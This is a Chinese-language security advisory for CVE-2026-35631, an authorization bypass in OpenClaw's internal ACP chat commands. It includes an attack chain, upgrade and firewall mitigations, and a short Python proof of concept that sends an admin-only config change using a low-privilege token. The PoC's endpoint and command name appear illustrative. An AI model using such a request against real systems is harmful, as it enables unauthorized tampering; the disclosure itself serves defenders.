CVE-2026-35631 CVSS 6.5 中危

CVE-2026-35631 OpenClaw权限绕过漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35631

漏洞类型

权限绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.22之前的版本中存在权限绕过漏洞，由于未能在内部ACP聊天命令中强制执行operator.admin作用域，导致授权机制失效。低权限攻击者可绕过安全限制，直接调用受影响的ACP命令执行变更性控制平面操作，造成高完整性风险。

技术细节

该漏洞源于OpenClaw内部管理控制平面（ACP）聊天命令的权限校验逻辑缺陷。尽管前端界面可能实施了作用域限制，但后端命令处理器在处理变更性请求前未强制验证`operator.admin`作用域。拥有低权限的攻击者可通过直接向受影响的ACP端点发送特制聊天命令或请求，绕过前端授权检查。系统错误地假定调用者具备管理员权限，从而执行非预期的系统配置修改或数据变更操作。

攻击链分析

STEP 1

信息收集

攻击者识别目标运行OpenClaw版本小于2026.3.22。

STEP 2

获取低权凭证

攻击者注册或获取一个普通用户凭证（低权限）。

STEP 3

发送恶意请求

利用低权凭证向内部ACP聊天命令接口发送变异指令，绕过UI层限制。

STEP 4

未授权操作

后端因缺少scope校验，执行了本应仅限Admin的变更操作，导致系统被篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit Title: OpenClaw Missing Authorization PoC
# Description: Sends a mutating ACP command without admin scope.

target_url = "http://target-host:8080/api/acp/command"
# The vulnerable command usually requires operator.admin scope
payload = {
    "command": "internal_acp_modify_config",
    "args": {"setting": "malicious_value"}
}
# Attacker uses a low-privilege token
headers = {
    "Authorization": "Bearer <low_privilege_token>",
    "Content-Type": "application/json"
}

response = requests.post(target_url, json=payload, headers=headers)
if response.status_code == 200:
    print("[+] Command executed successfully. Authorization bypassed.")
else:
    print("[-] Failed.")

影响范围

OpenClaw < 2026.3.22

防御指南

临时缓解措施

建议立即升级至修复版本（2026.3.22+）。若无法立即升级，应通过防火墙规则限制对ACP聊天接口的访问权限，仅允许受信任的管理员IP地址连接，并对内部命令调用实施额外的日志监控以检测异常行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表